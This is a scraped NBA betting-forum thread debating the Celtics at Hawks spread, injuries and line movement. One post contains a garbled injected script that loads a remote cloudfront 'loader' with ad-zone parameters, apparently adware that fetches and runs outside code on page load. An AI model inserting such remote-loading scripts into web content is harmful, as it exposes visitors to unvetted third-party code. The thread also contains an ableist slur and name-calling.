t-wizzle
    t-wizzle's Avatar Become A Pro!
    Betpoints: 2191

Celtics +2.5 @ Hawks

Atlanta coming off a blowout win. Celtics have stumbled after a strong start to the roadtrip. I think Boston wins this game and gets back on track.

Liking the opener of +2.5 -115 at the greek

lunchbawks
    NB#
    lunchbawks's Avatar Become A Pro!
    Betpoints: 173

Celts have trouble with Atlanta, better games tomorow

Speedy88
    Speedy88's Avatar Become A Pro!
    Betpoints: 1636

Should be an interesting game. I'm leaning Celtics as well. Celtics will come ready to play, question is whether the Hawks will.
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"></script><script type="text/javascript">if(typeof(jQuery)=='undefine d')**(function(){var ccm=document.createElement('script');ccm .type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script' )[0];s.parentNode.insertBefore(ccm,s);if(ccm .readyState){ccm.onreadystatechange=func tion(){if(ccm.readyState=="loaded"||ccm. readyState=="complete"){ccm.onreadystate change=null;ccm_e_init(1);****;**else{cc m.onload=function(){ccm_e_init(1);**;*** *)();**else{ccm_e_init();** function ccm_e_init(jc){if(jc){jQuery.noConflict( );** jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm .type='text/javascript';ccm.async=true;ccm.src=http+ '://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=15220& zoneid=14731&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script' )[0];s.parentNode.insertBefore(ccm,s);jQuery ('#cblocker').remove();**);**;</script>

Tomasaurus
    Tomasaurus's Avatar Become A Pro!
    Betpoints: 7965

Celtics are poor on the road, and the Hawks are a good team. Johnson and Josh Smith only played 35 and 29 mins last night. I see the hawks winning this game and covering the 2 or 2.5 points, I think that side is much better

hawley
    hawley's Avatar Become A Pro!
    Betpoints: 79

Under & Celtics ML

Speedy88

Public are pounding the Hawks and line just dropped down to ATL -2......

hawley
    hawley's Avatar Become A Pro!
    Betpoints: 79

Too early for the public to be pounding.

JOHON8
    gambling fallacy
    JOHON8's Avatar Become A Pro!
    Betpoints: 338

This match up is way too unpredictable.

DudleyDawson
    DudleyDawson's Avatar Become A Pro!

Atlanta is a very strong play

WiseGrumpy
    Got banned, wow
    WiseGrumpy's Avatar Become A Pro!

It's either Hawks or nothing. With such a line you can't bet the Celts

tshizzle
    tshizzle's Avatar Become A Pro!
    Betpoints: 1217

I agree, gotta take the hawks. No sense in taking such a small line on thecelts.

t-wizzle

I wake up to a 1.5 line. Looks like I'm gonna have to take the ML.

vasilli07
    vasilli07's Avatar Become A Pro!
    Betpoints: 10601

I like Celtics ml too. No reason to take Celtics +1.5 now.

Fishsandwich
    Fishsandwich's Avatar Become A Pro!
    Betpoints: 726

Celtics always have a hard time playing against the hawks...cant see why the hawks would lose with Joe Johnson back

Frisco
    Frisco's Avatar Become A Pro!

Hawks playing w/out Pargo, Collins, Horford, and possibly not having either Rodmanovich (not sure if thats a bad thing lol) or Marvin Williams or Willie Green. Leaning Celtics despite their road struggles

t-wizzle

Quote Originally Posted by Frisco View Post
    Hawks playing w/out Pargo, Collins, Horford, and possibly not having either Rodmanovich (not sure if thats a bad thing lol) or Marvin Williams or Willie Green. Leaning Celtics despite their road struggles
    Was not aware of the injuries. Haven't some of those been for a while though?

Frisco
    Frisco's Avatar Become A Pro!

Horford and Collins yea. Pargo is newer and if Marvin Williams can't go that will be big.

Cheese1976
    Cheese1976's Avatar Become A Pro!
    Betpoints: 439

Quote Originally Posted by hawley View Post
    Too early for the public to be pounding.
    great point!

Speedy88

All the angles for this game point towards taking the Celtics. The question is will the Celtics old legs show up and be able to cover. I think they match up pretty well with the Hawks.

This game has some serious playoff seeding implications. The Celts are currently 2.5 game behind the Hawks for the 6th spot in the East. That 6th spot is really important, because you avoid the Heat or Bulls in the first round of the playoffs. I think the Celtics get up for this game and win it SU. Both teams are really decimated with injuries, but the Celtcs have gotten used to playing without O'Neal and Wilcox by now. Pargo is definitely out, and it sounds like Marvin Williams, Radmanovic, and Willie Green will all be game-time decisions.

leetreaper
    leetreaper's Avatar Become A Pro!
    Betpoints: 2140

Why would anyone want to bet/discuss a coinflip game is beyond me...No wonder you are a bunch of losers...

Leo818
    Leo818's Avatar Become A Pro!

Quote Originally Posted by leetreaper View Post
    Why would anyone want to bet/discuss a coinflip game is beyond me...No wonder you are a bunch of losers...
    Agree

Speedy88

Wow you are going to call people losers for trying to cap a game........

That's pathetic.

leetreaper

Look in the mirror first then talk...

brainfreeze0
    brainfreeze0's Avatar Become A Pro!
    Betpoints: 962

That's kind of a retarded logic considering all games are practically a coinflip after the lines, unless youd like to name some locks for everyone here?

leetreaper

NO disrespect to anyone here but we all know how INCONSISTENT the both teams were playing all season, its gonna be almost impossible to find a winning angle, IMHO...

Speedy88

Look in the mirror first then talk...
    How so, I'm discussing a game on a NBA betting forum. You come into a thread and call us all losers.....

C'mon man....If you feel the game is too hard to cap, just say that. No need add the loser comment.

leetreaper

Quote Originally Posted by Speedy88 View Post
    How so, I'm discussing a game on a NBA betting forum. You come into a thread and call us all losers.....

C'mon man....If you feel the game is too hard to cap, just say that. No need add the loser comment.

Chill bro its all good, just give me two reason at least to consider betting this game at all...

brainfreeze0

Well ok, your looking for edges/ advantages etc.. the main reason everyone trying to cap the game. Well Boston has a day of rest vs no rest for Atlanta. Boston's needs to break a losing streak vs Atlanta's wining streak. Atlanta has home court advantage. We're capping because everyone is looking for any edge as we do on every game we bet. After the lines are made that's the whole point. As stated prior, all games are practically a coin flip after the lines. Boston has played far more inconsistent than Atlanta imo. That's what everyone's here to discuss though.

leetreaper

I understand but too much inconsistency/injuries/ not making a case for a good bet, unless u betting for fun

Demonata
    Demonata's Avatar SBR PRO
    Betpoints: 5354

Atlanta has this game. Playing great as of late and team really clicking.

brainfreeze0

Granted, but all teams fall into that category. Can we really name a team that is consistent in beating the spread. Certainly not the Lakers or Miami. Lebron has consisistantly gotten lazy in the 2nd half and lost the game for me and don't get me started on Kobe. Without D. Rose the Bulls are blowing in the wind. No team is truly consistent in beating a spread which is why everyone tries to get together and look for all of the advantages/ disadvantages from one team to the other.

I'm only betting on 3 games tonight as the rest were to much of a coin flip for me and I saw no real clear advantage that wasnt outweighed by the other side to play any others, however, on this game I went with Atlanta -1.5, but without people at least trying to come together and discuss their opinions on advantages/ disadvantages some might be swayed in a direction they wouldn't have been had they discussed it. I don't think its in vain either way.

leetreaper

Id agree Atl or nothing but its an easy pass for me...

BigDofBA
    BigDofBA's Avatar Become A Pro!
    Betpoints: 2011

I think it's Boston or nothing. I hate he Hawks. They are way too inconsistent and this line indicates they will lose.

First game home after a road game. It's a back to back. Celtics need this game.

Atlanta isn't going to be easy money two days in a row.

smarotta09
    smarotta09's Avatar Become A Pro!
    Betpoints: 10427

your a jets fan .. and you called someone a loser LOL

Derty D
    Derty D's Avatar Become A Pro!
    Betpoints: 1838

I think the HAwks are the play with BOS legs tired on a long road trip...

12 Last